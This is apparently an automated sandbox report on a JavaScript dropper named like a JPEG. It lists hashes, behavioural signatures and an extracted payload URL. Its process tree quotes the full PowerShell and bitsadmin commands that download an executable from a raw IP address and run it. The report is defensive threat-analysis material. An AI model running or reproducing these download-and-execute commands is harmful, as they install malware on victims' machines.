Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-08-2024 20:34
Static task
static1
Behavioral task
behavioral1
Sample
83756c7a0955e458e90b540989d0d4ed_JaffaCakes118.zip
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
83756c7a0955e458e90b540989d0d4ed_JaffaCakes118.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
PIC119166.jpg.js
Resource
win7-20240708-en
General
-
Target
PIC119166.jpg.js
-
Size
650B
-
MD5
a7ab035cbabbaa850b95e1eb8c877789
-
SHA1
1175c71d4e70591c3816292fd9107486a7fb3bbe
-
SHA256
a84be445b2a8be5ed37e7d23816293f15ba5acec72fde6e77d59db4832eace48
-
SHA512
7189b836a35309cc29acadfb3ed9bb915db1adb47780b70c1ec44ab308d46eaebdc1ab1fae7a460d437f47fef781c0a4d7d9c4e025f7de6e0952b21d792c1854
Malware Config
Extracted
http://217.8.117.63/tspam.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 2948 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2948 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
wscript.execmd.execmd.exedescription pid process target process PID 2924 wrote to memory of 2672 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2672 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2672 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2760 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2760 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2760 2924 wscript.exe cmd.exe PID 2672 wrote to memory of 2948 2672 cmd.exe powershell.exe PID 2672 wrote to memory of 2948 2672 cmd.exe powershell.exe PID 2672 wrote to memory of 2948 2672 cmd.exe powershell.exe PID 2760 wrote to memory of 2648 2760 cmd.exe bitsadmin.exe PID 2760 wrote to memory of 2648 2760 cmd.exe bitsadmin.exe PID 2760 wrote to memory of 2648 2760 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PIC119166.jpg.js1⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe3⤵
- Download via BitsAdmin
PID:2648